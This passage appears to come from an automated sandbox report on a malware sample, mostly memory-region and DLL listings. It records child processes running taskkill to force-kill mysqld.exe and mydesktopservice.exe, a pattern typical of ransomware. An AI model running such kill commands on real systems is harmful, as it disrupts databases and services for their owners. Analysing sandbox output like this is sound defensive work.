0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1488 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1489 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1490 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1491 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1492 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1493 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1494 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1495 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1496 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1497 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1498 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1499 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1500 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1501 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1502 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1503 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1504 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1505 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1506 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1507 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1508 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1509 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 108 os_tid = 0xb68 Thread: id = 130 os_tid = 0x688 Thread: id = 141 os_tid = 0x5e0 Thread: id = 144 os_tid = 0x77c Thread: id = 145 os_tid = 0x7f8 Process: id = "16" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x1bba000" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM mydesktopservice.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1217 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1218 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1219 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1220 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1221 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1222 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1223 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1224 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1225 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1226 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1227 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1228 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1229 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1230 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1231 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1540 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1541 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1542 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1543 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1544 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1545 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1546 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1547 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1548 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1549 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1550 start_va = 0x340000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1551 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1552 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1553 start_va = 0x4f0000 end_va = 0x677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1554 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1555 start_va = 0x810000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1556 start_va = 0x1c10000 end_va = 0x1ccffff entry_point = 0x1c10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1557 start_va = 0x1ce0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1558 start_va = 0x1e10000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 1559 start_va = 0x1f60000 end_va = 0x1fdffff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1560 start_va = 0x2060000 end_va = 0x20dffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1561 start_va = 0x20e0000 end_va = 0x23aefff entry_point = 0x20e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1562 start_va = 0x2490000 end_va = 0x250ffff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1563 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1564 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1565 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1566 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1567 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1568 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1569 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1570 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1571 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1572 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1573 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1574 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1575 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1576 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1577 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1578 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1579 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1580 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1581 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1582 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1583 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1584 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1585 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1586 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1587 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1588 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1589 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1590 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1591 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1592 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1593 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1594 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1595 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1596 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1597 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1598 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1599 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1600 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1601 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1602 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Thread: id = 120 os_tid = 0xbd4 Thread: id = 148 os_tid = 0x764 Thread: id = 150 os_tid = 0x78c Thread: id = 155 os_tid = 0x250 Thread: id = 156 os_tid = 0x4e4 Process: id = "17" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x1f8d9000" os_pid = "0xbec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM mysqld.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1232 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1233 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1234 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1235 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1236 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1237 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1238 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1239 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1240 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1241 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1242 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1243 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1244 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1245 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1246 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1603 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1604 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1605 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1606 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1607 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1608 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1609 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1610 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1611 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1612 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1613 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1614 start_va = 0x230000 end_va = 0x2effff entry_point = 0x230000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1615 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1616 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1617 start_va = 0x570000 end_va = 0x6f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1618 start_va = 0x700000 end_va = 0x880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1619 start_va = 0x890000 end_va = 0x1c8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1620 start_va = 0x1cc0000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 1621 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1622 start_va = 0x1de0000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 1623 start_va = 0x1e60000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1624 start_va = 0x1ee0000 end_va = 0x21aefff entry_point = 0x1ee0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1625 start_va = 0x2360000 end_va = 0x23dffff entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 1626 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1627 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1628 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type 